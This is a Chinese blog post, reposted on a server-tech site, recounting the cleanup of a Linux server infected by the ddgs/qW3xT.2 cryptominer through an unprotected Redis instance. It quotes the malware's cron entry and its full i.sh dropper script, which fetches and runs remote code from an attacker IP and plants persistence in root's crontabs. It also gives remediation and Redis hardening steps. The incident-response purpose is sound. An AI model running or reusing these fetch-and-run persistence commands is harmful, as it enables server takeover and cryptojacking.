服务器之家:专注于VPS、云服务器配置技术及软件下载分享
分类导航

Linux|Centos|Ubuntu|系统进程|Fedora|注册表|Bios|Solaris|Windows7|Windows10|Windows11|windows server|

服务器之家 - 服务器系统 - Linux - linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录

linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录

2022-07-21 09:02yuantc Linux

这篇文章主要给大家介绍了关于linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起看看吧

前言

随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑cpu占用率高,c盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题。

本文主要介绍的是关于linux植入ddgs、qw3xt.2挖矿病毒的处理方法,下面话不多说了,来一起看看详细的介绍吧

被入侵后的现象:

发现有qw3xt.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现。

linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录

kill 掉这两个异常进程后,过一段时间看到了如下进程:

linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录

首先在/etc/sysconfig/crotnab中的定时任务没有找到定时脚本,输入crontab -e 在其中找到了该定时任务

?
1
*/5 * * * * curl -fssl http://149.56.106.215:8000/i.sh | sh
?
1
<span style="font-size: 15px;">查询了下149.56.106.215在美国,i.sh 脚本内容如下:</span>
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fssl http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -o- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fssl http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -o- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
 curl -fssl http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
 
ps auxf | grep -v grep | grep circle_mi | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

处理方法:

1.删除  crontab -e 中

?
1
*/5 * * * * curl -fssl http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客设置的免密登录内容

3.修改redis密码

4.修改root与登录账户密码

安全建议:

1.配置bind选项,限定可以连接redis服务器的ip,修改 redis 的默认端口6379 配置认证,也就是auth,设置密码,密码会以明文方式保存在redis配置文件中

2.配置rename-command 配置项 “rename_config”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度

3.如果可以在防火墙中屏蔽redis外网      

入侵方式:

收集了相关资料,了解到其是利用redis漏洞,未设置密码或密码太简单,导致的被入侵。具体方式可以参考

 

reids修改密码方法如下:

?
1
2
3
redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##获取当前密码
config set requirepass "yourpassword" ##设置当前密码,服务重新启动后又会置为默认,即无密码;

永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:

?
1
requirepass yourpassword ##此处注意,行前不能有空格

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对服务器之家的支持。

原文链接:https://www.cnblogs.com/ytc6/p/9636319.html

延伸 · 阅读

精彩推荐
  • Linux详解Linux 查看服务器开放的端口号

    详解Linux 查看服务器开放的端口号

    本篇文章主要介绍详解Linux 查看服务器开放的端口号,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧...

    潇湘隐者4572022-01-04
  • Linuxlinux useradd(adduser)命令参数及用法详解(linux创建新用户命令)

    linux useradd(adduser)命令参数及用法详解(linux创建新用户命令)

    useradd可用来建立用户帐号。帐号建好之后,再用passwd设定帐号的密码.而可用userdel删除帐号。使用useradd指令所建立的帐号,实际上是保存在/etc/passwd文本...

    Linux教程网9172019-12-25
  • LinuxLinux 5.17引入“RTLA”:实时Linux性能分析与追踪工具

    Linux 5.17引入“RTLA”:实时Linux性能分析与追踪工具

    用于 Linux 实时系统分析的新工具“RTLA” 已加入 Linux 5.17 内核源码树。RTLA 全名 real-time Linux analysis tool ,是一款实时 Linux 分析和跟踪工具。...

    马哥Linux运维5452022-01-24
  • Linux远程修改Linux系统VPS服务器Root用户密码教程

    远程修改Linux系统VPS服务器Root用户密码教程

    当你刚接触Linux系统的VPS主机时,运营商往往会给你一个Linux系统的远程登陆管理的用户名和密码。而这个密码是默认的切具有一定规律,所以是非常不安全...

    Linux教程网3982019-12-11
  • Linux关于Linux命令行下的数学运算示例详解

    关于Linux命令行下的数学运算示例详解

    在Linux中直接使用数学运算符进行数学运算往往得不到我们想要的计算结果。要在Shell中进行数学运算,我们需要借助点小手段。下面这篇文章主要给大家介...

    Sandra Henry-Stocker11832022-03-10
  • Linux详解linux软连接和硬链接

    详解linux软连接和硬链接

    这篇文章主要介绍了详解linux软连接和硬链接,硬链接与软链接是 Linux 文件系统中的一个重要概念,这里整理了详细的整理,有需要的小伙伴可以参考下。...

    iTech11312021-11-21
  • LinuxTeLOS Linux,基于 Debian 的全新 Linux 发行版

    TeLOS Linux,基于 Debian 的全新 Linux 发行版

    Linux 发行版的爱好者们又有全新的 Linux 可以体验了,日前一款名为 TeLOS 的 Linux 发行版正式诞生,它的愿景是希望在最新的 GNU/Linux 技术之上,为你提供一...

    开源中国8622021-03-16
  • LinuxLinux 挂载分区的方法

    Linux 挂载分区的方法

    这篇文章主要介绍了Linux 挂载分区的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧...

    揅笑晏晏3652022-07-16